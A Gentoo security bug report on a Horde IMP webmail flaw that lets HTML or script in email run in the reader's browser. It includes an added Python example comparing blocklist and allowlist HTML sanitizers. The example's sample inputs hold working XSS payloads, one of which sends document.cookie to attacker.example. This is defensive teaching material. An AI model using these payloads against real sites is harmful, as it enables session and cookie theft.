
Bug 53862

Summary: net-www/horde-imp Input Validation Vulnerability
Product: Gentoo Security
Reporter: Lance Albertson (RETIRED) <ramereth>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: minor    
Priority: High    
Version: unspecified   
Hardware: All   
OS: All   
Whiteboard: B3 [glsa]
Package list:
Runtime testing required: ---

Description Lance Albertson (RETIRED) gentoo-dev 2004-06-13 23:37:43 UTC
Excerpt from my SANS email:

04.23.34 CVE: Not Available
Platform: Web Application
Title: Horde IMP Input Validation Vulnerability
Description: Horde IMP is a web-based IMAP email interface written in
PHP. Insufficient sanitization of email messages that contain
malicious HTML or script code expose an arbitrary HTML injection and
script execution issue. All current releases in the 3.x branch are
affected.
Ref: http://www.horde.org/imp/3.2/

I don't see anything specific on their site about what exactly causes this (might be in the ChangeLog when you download it). Version 3.2.4 is in portage, but marked ~arch on all arches. Bug #53400 was the initial bug for getting it into portage, but no mention of the security fix.
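The SANS text above only names the vulnerability class (insufficient sanitization of HTML mail leading to script execution) and this bug never identifies the exact construct IMP 3.x mishandled, so the following is an added illustration of that class, not Horde IMP code and not the fix shipped in 3.2.4. It contrasts a blocklist sanitizer that only strips <script> elements with an allowlist sanitizer that keeps known-safe tags, attributes and URL schemes, run over constructed message bodies. The sample bodies, tag and scheme allowlists, and the has_active_content heuristic are assumptions made for the example.

```python
"""
Added example for the HTML-mail sanitization problem class described in the
bug's SANS excerpt. Not Horde IMP code; the specific IMP 3.x flaw is not
identified in the bug, so this shows the general class only.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message bodies (assumed attacker input, not real mail).
SAMPLE_BODIES = {
    "script_tag": '<p>Hi</p><script>document.location="http://attacker.example/?"+document.cookie</script>',
    "event_handler": '<p>Hi</p><img src="x" onerror="alert(document.cookie)">',
    "js_url": '<p><a href="javascript:alert(1)">invoice</a></p>',
    "benign": '<p>Hello <b>world</b>, see <a href="https://example.org/">this</a></p>',
}


def blocklist_sanitize(body: str) -> str:
    """Naive blocklist: remove <script>...</script> only. This is the
    'insufficient sanitization' pattern: event-handler attributes and
    javascript: URLs still reach the browser."""
    return re.sub(r"(?is)<script\b.*?</script\s*>", "", body)


# Allowlists are assumptions for the example; a real client needs a fuller set.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "br", "a", "ul", "ol", "li", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}


def _safe_url(value: str) -> bool:
    """Accept relative URLs and allowlisted schemes only. Browsers drop tabs
    and newlines inside URLs, so strip control characters before parsing."""
    probe = re.sub(r"[\x00-\x20]", "", value)
    scheme = urlsplit(probe).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Rebuild the document keeping only allowlisted tags/attributes;
    everything else, including unknown tags and all on* handlers, is dropped."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.skip_depth = 0  # >0 while inside <script>/<style>: drop text too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None and _safe_url(value):
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def allowlist_sanitize(body: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


# Heuristic used only to report whether active content survived sanitization.
ACTIVE_RE = re.compile(r"(?i)<script\b|\son[a-z]+\s*=|javascript:")


def has_active_content(markup: str) -> bool:
    return ACTIVE_RE.search(markup) is not None


if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        for label, fn in (("blocklist", blocklist_sanitize), ("allowlist", allowlist_sanitize)):
            out = fn(body)
            print(f"{name:14} {label:9} active={has_active_content(out)!s:5} {out}")
```

Running it shows the blocklist output still carrying the onerror handler and the javascript: link while the allowlist output keeps the benign body byte-for-byte and strips the three script vectors; the point for a webmail client is that rendering untrusted HTML safely requires an allowlist (or a separate origin), not a list of bad tags.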
Comment 1 SpanKY gentoo-dev 2004-06-14 04:58:54 UTC
moved 3.2.4 to stable and removed 3.2.3
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2004-06-15 11:43:04 UTC
GLSA drafted. Security please review.

Bugtraq announcement can be found here:

http://www.securityfocus.com/bid/10501/

Note: bug number 53862 does not appear in the ChangeLog
Comment 3 Kurt Lieber (RETIRED) gentoo-dev 2004-06-16 06:31:27 UTC
glsa 200406-11